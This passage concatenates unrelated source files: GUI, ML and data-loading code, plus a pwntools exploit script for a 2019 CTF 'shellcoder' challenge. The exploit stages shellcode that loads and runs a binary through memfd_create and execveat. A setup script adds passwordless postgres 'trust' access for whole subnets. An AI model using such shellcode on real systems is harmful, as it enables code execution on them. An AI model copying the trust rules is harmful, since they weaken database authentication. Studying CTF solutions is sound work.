self.set_url1(url)\r\n            if cookies:\r\n                self.set_cookies(cookies)\r\n            if headers:\r\n                self.set_headers(headers)\r\n            if not self.class_url1:\r\n                raise urlNotDefine('\\n\\nnot set request url\\n\\n')\r\n            if not self.class_cookies:\r\n                raise urlNoCookies('\\n\\nnot set requests cookies\\n\\n')\r\n        except urlNotDefine as except1:\r\n            print(except1)\r\n            quit()\r\n        except urlNoCookies as except2:\r\n            print(except2)\r\n            quit()\r\n\r\n        try:\r\n            if self.class_headers:\r\n                ret_obj=self.class_session.get(self.class_url1,cookies=self.class_cookies,headers=self.class_headers)\r\n            elif not self.class_headers:\r\n                ret_obj=self.class_session.get(self.class_url1,cookies=self.class_cookies)\r\n            else:\r\n                raise sessionCreFalse('\\n\\nnot set url, cookies, headers\\n\\n')\r\n            if(ret_obj.status_code!=200):\r\n                raise sessionCreFalse('\\n\\nsession not create successfully\\n\\n')\r\n            self.set_cookies(ret_obj.cookies)    \r\n            return ret_obj    \r\n\r\n        except sessionCreFalse as except0:\r\n            print(except0)\r\n            quit()\r\n    \r\n    \r\n\r\n    def post(self,url='',cookies={},data={},headers={}):\r\n        try:\r\n            if url:\r\n                self.set_url2(url)\r\n            if cookies:\r\n                self.set_cookies(cookies)\r\n            if headers:\r\n                self.set_headers(headers)\r\n            if not self.class_url2:\r\n                raise urlNotDefine('\\n\\nnot set request obj\\n\\n')\r\n            if not self.class_cookies:\r\n                raise urlNoCookies('\\n\\nnot set requests cookies\\n\\n')\r\n            if not self.class_headers:\r\n                raise urlNoHeaders('\\n\\nnot set requests headers\\n\\n')\r\n        except urlNotDefine as except1:\r\n            print(except1)\r\n            quit()\r\n        except urlNoCookies as except2:\r\n            print(except2)\r\n            quit()\r\n        except urlNoHeaders as except3:\r\n            print(except3)\r\n            quit()\r\n        try:\r\n            ret_obj=self.class_session.post(self.class_url2,cookies=self.class_cookies,headers=self.class_headers,data=data)\r\n            if ret_obj.status_code!=200:\r\n                raise sessionPost('\\n\\nsession post request error\\n\\n')\r\n            self.set_cookies(ret_obj.cookies)\r\n            return ret_obj\r\n        except sessionPost as except4:\r\n            print(except4)\r\n            quit()\r\n\r\n\r\n    def get(self,url='',cookies=0,headers={},params={}):\r\n        try:\r\n            if url:\r\n                self.set_url2(url)\r\n            if cookies:\r\n                self.set_cookies(cookies)\r\n            if headers:\r\n                self.set_headers(headers)\r\n            if (not self.class_url2):\r\n                raise urlNotDefine('\\n\\nnot set request obj\\n\\n')\r\n            if (not self.class_cookies):\r\n                raise urlNoCookies('\\n\\nnot set requests cookies\\n\\n')\r\n            if (not self.class_headers):\r\n                raise urlNoHeaders('\\n\\nnot set requests headers\\n\\n')\r\n        except urlNotDefine as except1:\r\n            print(except1)\r\n            quit()\r\n        except urlNoCookies as except2:\r\n            print(except2)\r\n            quit()\r\n        except urlNoHeaders as except3:\r\n            print(except3)\r\n            quit()\r\n        try:\r\n            ret_obj=self.class_session.get(self.class_url2,cookies=self.class_cookies,headers=self.class_headers,params=params)\r\n            if ret_obj.status_code!=200:\r\n                raise GetReqError('\\n\\nsession get request error\\n\\n')\r\n            self.set_cookies(ret_obj.cookies)\r\n            return ret_obj\r\n\r\n        except GetReqError as except4:\r\n            print(except4)\r\n            quit()\r\n","sub_path":"pwn/linux_pwn/mypwn/mypwn/mypwn/mypwnlib/submit_flag/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":5601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"116981845","text":"def kilograms_to_pounds():\n    user_kilograms = input(\"Your weight in kg: \")\n    user_pounds = float(user_kilograms) * 2.20462\n    print(\"Your weight in pounds: \" + str(user_pounds))\n\ndef pounds_to_kilograms():\n    user_pounds = input(\"Your weight in lbs: \")\n    user_kilograms = float(user_pounds) * 0.453592\n    print(\"Your weight in kilograms: \" + str(user_kilograms))\n\n\ndef user_weight():\n    user_name = input(\"What is your name? (You don't have to enter your full name) \")\n    weight_choice = input(\"Welcome, \" + user_name + \", to the weight converter! 
Would you like to convert your weight into \"\n                          \"pounds or kilograms?\\nPick one of the following\\nPounds (lbs)\"\n                          \" or Kilograms (kg): \").lower()\n    if weight_choice == \"lbs\" or weight_choice == \"pounds\":\n        kilograms_to_pounds()\n        print(\"Enjoy your day, \" + user_name + \" :D\")\n    elif weight_choice == \"kg\" or weight_choice == \"kilograms\":\n        pounds_to_kilograms()\n        print(\"Enjoy your day, \" + user_name + \" :D\")\n    else:\n        print(\"Your selection was invalid.\")\n\n\nuser_weight()","sub_path":"weight.py","file_name":"weight.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"576079702","text":"# This Python file uses the following encoding: utf-8\n\"\"\"Module for interaction with data storage\"\"\"\nfrom collections import namedtuple\nimport uuid\nfrom snakeguice import inject, annotate\n\n__author__ = 'xander27'\nimport numpy as np\nimport logging as log\nimport cPickle as pickle\n\nDataSet = namedtuple('DataSet',\n    ['n_samples', 'n_features', 'data','target',\n     'feature_names', 'target_names',\n     'feature_class_names', 'row_weights'])\ndef convert_sci_kit_data_set(data_set):\n    n_samples, n_features = np.shape(data_set.data)\n    return DataSet(\n        data = data_set.data,\n        n_samples = n_samples,\n        n_features = n_features,\n        target = data_set.target,\n        target_names = data_set.target_names,\n        feature_names = data_set.feature_names,\n        feature_class_names = dict(),\n        row_weights = [1] * n_samples\n    )\n\nclass DataProvider:\n\n    def __init__(self, file_name, init_data_file_name):\n        self.init_data_file_name = init_data_file_name\n        self._file_name = file_name\n        self._load_data()\n\n    def _init_data_from_keel(self, f_name):\n        \"\"\"\n        Load init data from KEEL format file\n\n        Params:\n            f_name: file name\n        \"\"\"\n        import pyparsing as pp\n\n\n        LabelVariable = namedtuple('LabelVariable', ['name', 'labels'])\n        NumberVariable = namedtuple('NumberVariable', ['name', 'min', 'max'])\n        #configure parser\n        empty_gap = uuid.uuid1()\n        var_name = pp.Word(pp.alphas + \"_+-/\" + pp.nums)\n        label = pp.Word(pp.nums + pp.alphas + \"_+-/.\")\n        number = pp.Word(pp.nums + \".-\").setParseAction(lambda t: [float(t[0])])\n        attr_begin = pp.Suppress(\"@attribute\") + var_name(\"name\")\n        attr_number = (\n            attr_begin + pp.oneOf(\"real integer\") + pp.Suppress(\"[\") +\n            number(\"min\") + pp.Suppress(\",\") + number(\"max\") + pp.Suppress(\"]\")\n        ).setParseAction(lambda t: NumberVariable(t.name, t.min, t.max))\n        attr_label = (\n            attr_begin + pp.Suppress(\"{\")+\n            pp.Group(pp.OneOrMore(label + pp.Suppress(\",\")) + label)\n            .setResultsName(\"labels\")\n            + pp.Suppress(\"}\")\n        ).setParseAction(lambda t: LabelVariable(t.name, list(t.labels)))\n        attr = attr_number | attr_label\n        output = pp.Suppress(\"@outputs\") + var_name\n        empty = ( pp.Literal(\"?\")).setParseAction(lambda t: empty_gap)\n        line = pp.Group(pp.OneOrMore((label | number | empty ) + pp.Suppress(\",\"))\n                        + ( label | number | empty ))\n        data = pp.Suppress(\"@data\") + pp.OneOrMore(line)\n        case = pp.Suppress(pp.SkipTo(attr)) + \\\n               pp.Group(pp.OneOrMore(attr)).setResultsName(\"attrs\")\\\n               + pp.Suppress(pp.SkipTo(output)) + output(\"output\") + data(\"data\")\\\n#            + pp.stringEnd\n        try:\n            with open(f_name, \"r\") as f:\n#                print f.read()\n                parsed = case.parseString(f.read())\n        except IOError:\n            log.error(\"Can't read init data from '%s'\" % self.init_data_file_name)\n            raise\n\n        vars = list(parsed.attrs)\n        output_var = None\n        for var in vars:\n            if var.name == 
parsed.output[0]:\n output_var = var\n break\n\n def get_var_value(var, val):\n if isinstance(var, NumberVariable):\n return val\n elif isinstance(var, LabelVariable):\n return var.labels.index(val)\n\n vars_count = len(vars)\n data_len = len(parsed.data)\n data = np.empty((data_len, vars_count - 1))\n target = np.empty(data_len)\n for i, line in zip(xrange(data_len), parsed.data):\n w = 0\n for j, var in zip(xrange(vars_count), vars):\n if var == output_var:\n if line[j] != empty_gap:\n target[i] = get_var_value(var, line[j])\n else:\n continue\n elif line[j] != empty_gap:\n data[i, w] = get_var_value(var, line[j])\n w+= 1\n else:\n data[i, w] = None\n w+=1\n vars.remove(output_var)\n feature_class_names = dict()\n for i, var in zip(xrange(len(vars)), vars):\n if isinstance(var, LabelVariable):\n feature_class_names[i] = var.labels\n return DataSet(\n n_samples = data_len,\n n_features = len(vars),\n data = data,\n target = target,\n feature_names = map(lambda v: v.name, vars),\n target_names = output_var.labels,\n feature_class_names = feature_class_names,\n row_weights = [1] * data_len\n )\n\n\n def _load_data(self):\n try:\n self._data = pickle.load(open(self._file_name, \"rb\"))\n except IOError:\n log.error(\"Can't read from '%s'\" % self._file_name)\n log.info(\"read data from '%s'\" % self.init_data_file_name)\n self._data = self._init_data_from_keel(self.init_data_file_name)\n\n def get_data(self):\n return self._data\n\n def set_data(self, data):\n self._data = data\n\n def save(self):\n try:\n pickle.dump(self._data, open(self._file_name, \"wb+\"))\n except IOError:\n log.error(\"Can't write to '%s'\" % self._file_name)\n raise\n","sub_path":"src/krasn/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":5492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"82284831","text":"import math\n\nimport torch\nfrom torch import nn\n\nfrom torchsparse.sparse_tensor import *\n\nfrom ..functional import *\n\n__all__ = ['Conv3d', 'ToBEVConvolution', 'ToBEVReduction', 'ToDenseBEVConvolution']\n\n\nclass Conv3d(nn.Module):\n def __init__(self,\n in_channels: int,\n out_channels: int,\n kernel_size: int = 3,\n stride: int = 1,\n dilation: int = 1,\n bias: bool = False,\n transpose: bool = False) -> None:\n super().__init__()\n self.in_channels = inc = in_channels\n self.out_channels = outc = out_channels\n self.kernel_size = kernel_size\n self.stride = stride\n self.dilation = dilation\n if not isinstance(kernel_size, (list, tuple)):\n self.kernel_volume = self.kernel_size ** 3\n self.kernel = nn.Parameter(\n torch.zeros(self.kernel_volume, inc,\n outc)) if self.kernel_size > 1 else nn.Parameter(\n torch.zeros(inc, outc))\n else:\n if len(self.kernel_size) == 3:\n self.kernel_volume = self.kernel_size[0]*self.kernel_size[1]*self.kernel_size[2]\n self.kernel = nn.Parameter(torch.zeros(self.kernel_volume, inc, outc))\n else:\n raise ValueError(\"kernel_size must be either an integer of a 3 dimensional tuple\")\n\n\n self.bias = None if not bias else nn.Parameter(torch.zeros(outc))\n self.t = transpose\n self.init_weight()\n\n if kernel_size == 1:\n assert not transpose\n\n def __repr__(self):\n if not self.t:\n return 'Conv3d(in_channels=%d, out_channels=%d, kernel_size=%d, stride=%d, dilation=%d)' % (\n self.in_channels, self.out_channels, self.kernel_size,\n self.stride, self.dilation)\n else:\n return 'Conv3d(in_channels=%d, out_channels=%d, kernel_size=%d, stride=%d, dilation=%d)' % (\n self.in_channels, 
self.out_channels, self.kernel_size,\n self.stride, self.dilation)\n\n def init_weight(self):\n std = 1. / math.sqrt(\n self.out_channels if self.t else self.in_channels *\n (self.kernel_volume))\n self.kernel.data.uniform_(-std, std)\n if self.bias is not None:\n self.bias.data.uniform_(-std, std)\n\n def forward(self, inputs):\n return conv3d(inputs,\n self.kernel,\n ks=self.kernel_size,\n bias=self.bias,\n stride=self.stride,\n dilation=self.dilation,\n transpose=self.t)\n\nclass ToBEVConvolution(nn.Module):\n def __init__(self, \n in_channels: int, \n out_channels: int, \n n_kernels: int, \n stride: int = 1, \n z_dim: int = 1, \n use_bias: bool = False):\n super().__init__()\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.stride = stride\n self.z_dim = z_dim\n self.kernel = nn.Parameter(torch.zeros(n_kernels, in_channels, out_channels))\n self.bias = nn.Parameter(torch.zeros(1, out_channels)) if use_bias else 0\n self.init_weight()\n\n def init_weight(self):\n std = 1. / math.sqrt(self.in_channels)\n self.kernel.data.uniform_(-std, std)\n \n def __repr__(self):\n return 'ToBEVConvolution(in_channels=%d, out_channels=%d, n_kernels=%d, stride=%d)'%(\n self.in_channels,\n self.out_channels,\n self.n_kernels,\n self.stride\n )\n\n def forward(self, inputs):\n features = inputs.F\n coords = inputs.C\n cur_stride = inputs.s\n ratio = cur_stride * self.stride\n\n kernels = torch.index_select(self.kernel, 0, coords[:, self.z_dim].long() / cur_stride)\n output_features = (features.unsqueeze(-1) * kernels).sum(1) + self.bias\n output_coords = coords.t().long()\n output_coords[self.z_dim, :] = 0\n if self.stride > 1:\n output_coords[:3] /= ratio\n output_coords[:3] *= ratio\n flatten = torch.cuda.sparse.FloatTensor(output_coords, output_features).coalesce()\n return SparseTensor(flatten.values(), flatten.indices().t().int(), ratio)\n\n\nclass ToBEVReduction(nn.Module):\n def __init__(self, \n z_dim: int = 1):\n super().__init__()\n self.z_dim = z_dim\n \n def __repr__(self):\n return 'ToBEVReduction(z_dim = %d)'%self.z_dim\n\n def forward(self, inputs):\n features = inputs.F\n coords = inputs.C\n cur_stride = inputs.s\n\n flatten_coords = coords.clone()\n flatten_coords[:, self.z_dim] = 0\n features_with_cnt = torch.cat([torch.ones_like(features[:, :1]), features], axis=1)\n flatten = torch.cuda.sparse.FloatTensor(flatten_coords.t().long(), features_with_cnt).coalesce()\n output_features = flatten.values()[:, 1:] / flatten.values()[:, :1]\n return SparseTensor(output_features, flatten.indices().t().int(), cur_stride)\n\n\nclass ToDenseBEVConvolution(nn.Module):\n def __init__(self, \n in_channels: int, \n out_channels: int, \n shape, \n offset: list = [0,0,0], \n z_dim: int = 1, \n use_bias: bool = False):\n super().__init__()\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.offset = torch.cuda.IntTensor([list(offset) + [0]])\n self.z_dim = z_dim\n self.n_kernels = int(shape[self.z_dim])\n self.bev_dims = [i for i in range(3) if i != self.z_dim]\n self.bev_shape = shape[self.bev_dims]\n self.kernel = nn.Parameter(torch.zeros(self.n_kernels, in_channels, out_channels))\n self.bias = nn.Parameter(torch.zeros(1, out_channels)) if use_bias else 0\n self.init_weight()\n \n def __repr__(self):\n return 'ToDenseBEVConvolution(in_channels=%d, out_channels=%d, n_kernels=%d)'%(\n self.in_channels,\n self.out_channels,\n self.n_kernels\n )\n\n\n def init_weight(self):\n std = 1. 
/ math.sqrt(self.in_channels)\n self.kernel.data.uniform_(-std, std)\n\n def forward(self, inputs):\n features = inputs.F\n coords = inputs.C\n cur_stride = inputs.s\n\n kernels = torch.index_select(self.kernel, 0, coords[:, self.z_dim].long() / cur_stride)\n sparse_features = (features.unsqueeze(-1) * kernels).sum(1) + self.bias\n sparse_coords = (coords - self.offset).t()[[3] + self.bev_dims].long()\n sparse_coords[1:] /= cur_stride\n batch_size = sparse_coords[0].max().item() + 1\n sparse_coords = sparse_coords[0] * int(self.bev_shape.prod()) + sparse_coords[1] * int(self.bev_shape[1]) + sparse_coords[2]\n bev = torch.cuda.sparse.FloatTensor(\n sparse_coords.unsqueeze(0),\n sparse_features,\n torch.Size([batch_size * int(self.bev_shape.prod()), sparse_features.size(-1)]),\n ).to_dense()\n return bev.view(batch_size, *self.bev_shape, -1).permute(0, 3, 1, 2).contiguous() # To BCHW\n","sub_path":"torchsparse/nn/modules/conv.py","file_name":"conv.py","file_ext":"py","file_size_in_byte":7321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"487895181","text":"class Employee:\n\temployee_count=0;\n\tdef __init__(self,name,salary):\n\t\tself.name=name;\n\t\tself.salary=salary;\n\t\tEmployee.employee_count+=1;\n\t\t\n\tdef displaycount(self):\n\t\tprint(\"Total Employee count: \"+str(Employee.employee_count));\n\t\t\n\tdef displayEmpData(self):\n\t\tprint(\"Employee name: \"+self.name+\" Employee Salary: \"+str(self.salary));\n\t\t\nemp1 = Employee(\"shailesh\",1000.0);\nemp2 = Employee(\"vishal\",2000.0);\n\nemp2.displaycount();\nemp1.displayEmpData();\nemp2.displayEmpData();\n\nif hasattr(emp1,\"salary\"):\n print(\"Employee has Salary attribute\");\n setattr(emp1,\"salary\",2500.0);\n emp1.displayEmpData();\nelse:\n print(\"Employee does not have Salary attribute\");","sub_path":"classes_objects/classex.py","file_name":"classex.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"605957146","text":"import Tkinter as tk\nimport tkFileDialog\nimport os\nimport cv2\nimport shutil\nimport numpy as np\nfrom PIL import Image, ImageTk\nfrom facemodel import *\n\nHUGE_FONT = (\"Verdana\", 16)\nLARGE_FONT = (\"Verdana\", 12)\nNORMAL_FONT = (\"Verdana\", 10)\nSMALL_FONT = (\"Verdana\", 8)\n\n\n\n# http://zetcode.com/gui/tkinter/dialogs/\n\n# controller\nclass FaceApp(tk.Tk):\n def __init__(self, *args, **kwargs):\n self.root = tk.Tk.__init__(self, *args, **kwargs)\n self.img_w = 480\n self.img_h = 360\n self.geometry(str(self.img_w + 240) + \"x\" + str(self.img_h*2 + 120) + \"+300+300\")\n tk.Tk.wm_title(self, \"FaceApp\")\n container = tk.Frame(self)\n container.pack(side=\"top\", fill=\"both\", expand=True)\n container.grid_rowconfigure(0, weight=1)\n container.grid_columnconfigure(0, weight=1)\n self.frames = {}\n\n # add new pages to that list:\n #for F in (StartPage):\n frame = StartPage(container, self)\n self.frames[StartPage] = frame\n frame.grid(row=0, column=0, sticky=\"nsew\")\n self.show_frame(StartPage)\n\n def show_frame(self, cont):\n frame = self.frames[cont]\n frame.tkraise()\n\n def do_nothing(self):\n filewin = tk.Toplevel(self)\n button = tk.Button(filewin, text=\"Do nothing button\")\n button.pack()\n print(\"do nothing\")\n\n\n\nclass StartPage(tk.Frame):\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n\n self.label_txt = tk.Label(self, text=\"Choose an action\", 
font=LARGE_FONT)\n        self.label_txt.pack(pady=10, padx=10)\n\n        #button1 = tk.Button(self, text=\"Visit Page 1\", command=lambda: controller.show_frame(PageOne))\n        #button1.pack()\n\n        self.button_train = tk.Button(self, text=\"Train\", fg=\"red\", command=self.train)\n        self.button_train.pack(side=tk.LEFT, padx=5)\n\n        self.button_authorize = tk.Button(self, text=\"Authorize\", fg=\"blue\", command=self.authorize, state=tk.DISABLED)\n        self.button_authorize.pack(side=tk.LEFT, padx=5)\n\n        #self.button_load_model = tk.Button(self, text=\"Load Model\", fg=\"green\", command=self.load_model)\n        #self.button_load_model.pack(side=tk.LEFT)\n\n        #self.button_save_model = tk.Button(self, text=\"Save Model\", fg=\"yellow\", command=self.save_model, state=tk.DISABLED)\n        #self.button_save_model.pack(side=tk.LEFT, padx=5)\n\n        self.button_close = tk.Button(self, text=\"Close\", fg=\"black\", command=self.quit)\n        self.button_close.pack(side=tk.LEFT, padx=5)\n\n\n        self.img_cam = np.zeros((controller.img_h, controller.img_w, 3), dtype=np.uint8)\n        self.img_res = None\n        self.img_cur = None\n        self.cap = cv2.VideoCapture(0)\n\n        # self.label_cam_txt = tk.Label(self, text=\"live camera stream\", font=SMALL_FONT)\n        # self.label_cam_txt.pack(side=tk.TOP, pady=0, padx=10)\n        self.label_cam_stream = tk.Label(master=controller)\n        self.label_cam_stream.pack(side=tk.TOP, pady=5)\n\n        self.label_img_res_txt = tk.Label(self, text=\"processed image:\", font=LARGE_FONT)\n        self.label_img_res_txt.pack(side=tk.TOP,pady=12, padx=10)\n\n        self.label_img_res = tk.Label(master=controller)\n        self.label_img_res.pack(side=tk.TOP, pady=5)\n\n        self.model = FaceModel()\n\n        self.show_video()\n\n\n    def train(self):\n        print(\"Train chosen!\")\n        #self.button_save_model['state'] = tk.NORMAL\n\n        self.model.train_model()\n        self.button_authorize['state'] = tk.NORMAL\n\n\n    def authorize(self):\n        print(\"Authorization chosen!\")\n        self.model.authorize()\n\n\n    def load_model(self):\n        # https://stackoverflow.com/questions/16429716/opening-file-tkinter\n        print(\"Load model chosen!\")\n        ftypes = [('model files', '*.model')]\n        dlg = tkFileDialog.Open(self.controller, filetypes = ftypes)\n        filename = dlg.show()\n\n        if filename != '' and filename is not None:\n            if self.model.load_model(filename):\n                # self.button_load_model['state'] = tk.DISABLED\n                self.button_save_model['state'] = tk.NORMAL\n                self.button_authorize['state'] = tk.NORMAL\n\n    def save_model(self):\n        print(\"save model chosen!\")\n        ftypes = [('model files', '*.model')]\n        cwd = os.getcwd()\n        filename = tkFileDialog.asksaveasfilename(initialdir=cwd, title=\"Select file\", filetypes=ftypes)\n        if filename != '' and filename is not None:\n            if self.model.save_model(filename):\n                self.button_load_model['state'] = tk.NORMAL\n                self.button_authorize['state'] = tk.NORMAL\n\n    def show_video(self):\n        if not self.cap.isOpened():\n            print(\"ERROR: cannot open the camera\")\n\n        flag, img_new = self.cap.read()\n        #print(\"capture...\")\n        if flag is None:\n            print(\"ERROR: cannot read the camera!\")\n        elif flag:\n            self.img_cam = img_new.copy()\n            self.img_cam = cv2.cvtColor(self.img_cam, cv2.COLOR_BGR2RGB)\n            self.img_cam = cv2.resize(self.img_cam, (self.controller.img_w, self.controller.img_h))\n\n            img1 = Image.fromarray(self.img_cam)\n            imgtk_cam = ImageTk.PhotoImage(image=img1)\n            self.label_cam_stream.imgtk = imgtk_cam\n            self.label_cam_stream.configure(image=imgtk_cam)\n\n            self.model.set_cam_image(self.img_cam)\n            self.img_res = self.model.get_res_image()\n\n            self.label_img_res_txt['text'] = self.model.get_info()\n\n            if 
self.img_res is None:\n self.img_res = self.img_cam\n\n img2 = Image.fromarray(self.img_res)\n imgtk_res = ImageTk.PhotoImage(image=img2)\n self.label_img_res.imgtk = imgtk_res\n self.label_img_res.configure(image=imgtk_res)\n\n self.label_cam_stream.after(50, self.show_video)\n\n def quit(self):\n if self.model.is_training:\n self.model.stop_thread()\n self.controller.quit()\n\ndef main():\n app = FaceApp()\n app.mainloop()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"FaceApp.py","file_name":"FaceApp.py","file_ext":"py","file_size_in_byte":6140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"552900804","text":"from pwn import *\n\ncontext.aslr=0\nr = process([\"./shellcoder\"])\n#r = remote(\"139.180.215.222\", 20002)\n\n\ncontext.arch = \"amd64\"\ncontext.log_level='debug'\n\ngdb.attach(r,'b* 0x15555554a0af')\nr.sendafter(\":\",asm(\"\"\"\npush rdi\npop rsi\nxchg edi,edx\nsyscall\nnop\n\"\"\"))\n\n# syscall(SYS_execveat, exec_fd, \"\", argv, NULL, AT_EMPTY_PATH);\n# int fd=SYS_memfd_create(char *uname, unsigned int flags)\n# int n=SYS_read(0,buf,n)\n# int n=SYS_write(fd,buf,n)\n# tub_execveat(int fd, char *filename(point to zero),0,0,0x1000)\n\nr.send(\"\\x90\"*0x30+asm(shellcraft.pushstr(\"byzero\"))+asm(\"\"\"\nmov rax,319\nmov rdi,rsp\nmov rsi,0\nsyscall\nmov rbx,rax\nloop:\nmov rdi,0\nmov rsi,rsp\nmov rdx,0x400\nmov rax,0\nsyscall\ncmp rax,0\nje go\nmov rdi,rbx\nmov rsi,rsp\nmov rdx,rax\nmov rax,1\nsyscall\njmp loop\ngo:\nmov rdi,rbx\npush 0\nmov rsi,rsp\nxor rdx,rdx\nxor r10,r10\nmov r8,0x1000\nmov rax,322\nsyscall\n\"\"\"))\n\n\nr.recvrepeat(1)\nr.send(open(\"find_flag\").read()) # another binary we want to execute\nr.shutdown(\"send\") # close the tube\n\nr.interactive()\n","sub_path":"2019/2019-rctf/shellcoder/balsn_exp.py","file_name":"balsn_exp.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"45980962","text":"#!/usr/bin/python\n#\n'''\n[ auth_go_setup.py ]\n\nCOPYRIGHT (c) 2017 by MediaMath, Cambridge, MA USA.\nAll rights reserved. 
This material contains unpublished, copyrighted\nwork including confidential and proprietary information of MediaMath.\n\nset of steps necessary to perform after any environment's adama database\nrefresh is performed in order to properly configure auth.go (for taxonomy\ntests)\n'''\n\nimport logging\nimport optparse\nimport ssh_util\n\nparser = optparse.OptionParser(description=\"Auth.go setup\")\nparser.add_option(\"--ssh_ip\", type=str, help=\"ssh ip address\")\nparser.add_option(\"--ssh_port\", type=str, help=\"ssh port\")\nparser.add_option(\"--private_key\", type=str,\n default=\"/home/jenkins/.ssh/dmp-ec2-qa.pem\",\n help=\"private key for ssh security\")\nparser.add_option(\"--log_level\", type=str, default=\"DEBUG\",\n help=\"logging level\")\nparser.add_option(\"--postgres_file\", type=str,\n default=\"/etc/postgresql/9.4/main/pg_hba.conf\")\nparser.add_option(\"--adama_start_file\", type=str,\n default=\"/apps/t1_v2/prod/adama_start.pl\")\nparser.add_option(\"--adama_conf_file\", type=str,\n default=\"/apps/t1_v2/prod/adama_local.conf\")\nargs, _ = parser.parse_args()\n\n# configuration\nSSH_IP = args.ssh_ip\nSSH_PORT = args.ssh_port\nPRIVATE_KEY = args.private_key\nLOG_LEVEL = args.log_level\nPOSTGRES_FILE = args.postgres_file\nADAMA_START_FILE = args.adama_start_file\nADAMA_CONF_FILE = args.adama_conf_file\n\n\ndef ssh():\n ssh_ins = ssh_util.SSHUtil(SSH_IP, SSH_PORT)\n init()\n return ssh_ins\n\n\ndef init():\n \"\"\" init once for all the test in this class \"\"\"\n\n private_key = PRIVATE_KEY\n log_level = LOG_LEVEL\n\n level = logging.INFO if log_level == 'INFO' else logging.DEBUG\n logging.basicConfig(level=level)\n logging.info('set logging level to: : %s', log_level)\n\n ssh_util.SSHUtil.ssh_add_private_key(private_key)\n\n\nssh_object = ssh()\n\nlogging.info('Add necessary IP addresses to postgres config')\nlocal_connections = [\n \"host adama_camb-dev adama 10.150.68.0/22 trust\",\n \"host adama_camb-dev adama 10.150.69.0/22 trust\",\n \"host adama_camb-dev adama 10.150.70.0/22 trust\",\n \"host adama_camb-dev adama 10.150.71.0/22 trust\"]\n\nfor conn in local_connections:\n ssh_object.append_string_to_file(\"# IPv4 local connections:\",\n conn,\n POSTGRES_FILE)\n\nlogging.info('Restarting postgresql service')\ncommand = \"sudo service postgresql restart\"\nssh_object.ssh_execute_cmd(command, return_subprocess=True)\n\nlogging.info('Add environment variable to Adama startup routine')\nssh_object.append_string_to_file(\"$ENV{USE_DBIX_CONNECTOR} = 0;\",\n \"\\$ENV{PERL_LWP_SSL_VERIFY_HOSTNAME} = 0;\",\n ADAMA_START_FILE)\n\nlogging.info('Rename entitlements to auth.go')\nssh_object.replace_string_in_file(\"/entitlements/\",\n \"/authgo/\",\n ADAMA_CONF_FILE)\n\nlogging.info('Add timeout to auth.go configuration')\nssh_object.append_string_to_file(\"url https://localhost/authgo/\",\n \"\\ timeout 15\",\n ADAMA_CONF_FILE)\n\nssh_object.restart_service_by_name(\"adama_v2\")\n","sub_path":"plexus/tests/ads-mmtest/lib/utils/auth_go_setup.py","file_name":"auth_go_setup.py","file_ext":"py","file_size_in_byte":3361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"217774136","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# @package camLivePy\n#\n# This code is used to view a live stream of images on the computer\n#\n\n\n# Socket server\nimport sys\nimport numpy as np\nfrom optparse import OptionParser # Parser for command line options\nimport subprocess\nimport signal\nimport time\n\ntry:\n import cv\nexcept:\n 
import cv2 as cv\n\nfrom camSocketPy import *\n\n\n##\n# @brief Gets image from CamLight (throught socket)\n##\ndef getImage(addressSocket):\n client = ClientSocketUDP('livePreview', addressSocket, portSocketCamlive)\n ready = select.select([client.client_socket], [], [], None)\n sizeHeader = 0\n\n if ready[0]:\n recv_data = client.client_socket.recv(65536)\n numberOfPacketsToReceive, imageWidth, imageHeight = map(\n int, recv_data.split(' ')) # convert to int what we receive from socket\n\n while True:\n # init\n timeout_in_seconds = None\n client.send('get')\n recv_data = ''\n packetsReceived = 0\n imgBuffer = []\n\n # Receive packets\n while(packetsReceived != numberOfPacketsToReceive):\n ready = select.select([client.client_socket], [], [], timeout_in_seconds)\n if ready[0]:\n recv_data = client.client_socket.recv(65536)\n packetsReceived += 1\n if (packetsReceived == 1):\n # convert to int what we receive from socket\n timestampStart, timestampEnd = map(int, recv_data.split(' '))\n else:\n if (packetsReceived == 2):\n sizeHeader = len(recv_data)\n imgBuffer.extend(recv_data)\n client.send(str(packetsReceived))\n\n # Read buffer/image for display\n nparr = np.asarray(bytearray(imgBuffer[sizeHeader:]), dtype=np.uint8)\n imgB = np.reshape(nparr, (imageHeight, imageWidth))\n\n try:\n cv.ShowImage('', cv.fromarray(imgB))\n except:\n cv.imshow('', imgB)\n\n try:\n cv.WaitKey(1)\n except:\n # cv.waitKey(10)\n pass\n\n\ndef killOnCam(addressSocket):\n # Command to run via ssh\n HOST = \"root@\" + addressSocket\n # Ports are handled in ~/.ssh/config since we use OpenSSH\n COMMAND = \"killall camlive\"\n\n # ssh = subprocess.Popen([\"ssh\", \"%s\" % HOST, COMMAND],\n # shell=False,\n # stdout=subprocess.PIPE,\n # stderr=subprocess.PIPE)\n subprocess.Popen([\"ssh\", \"%s\" % HOST, COMMAND],\n shell=False,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n\n\ndef runOnCam(addressSocket):\n # Command to run via ssh\n HOST = \"root@\" + addressSocket\n # Ports are handled in ~/.ssh/config since we use OpenSSH\n COMMAND = \"/sdcard/bin/camlive\"\n\n # ssh = subprocess.Popen([\"ssh\", \"%s\" % HOST, COMMAND],\n # shell=False,\n # stdout=subprocess.PIPE,\n # stderr=subprocess.PIPE)\n 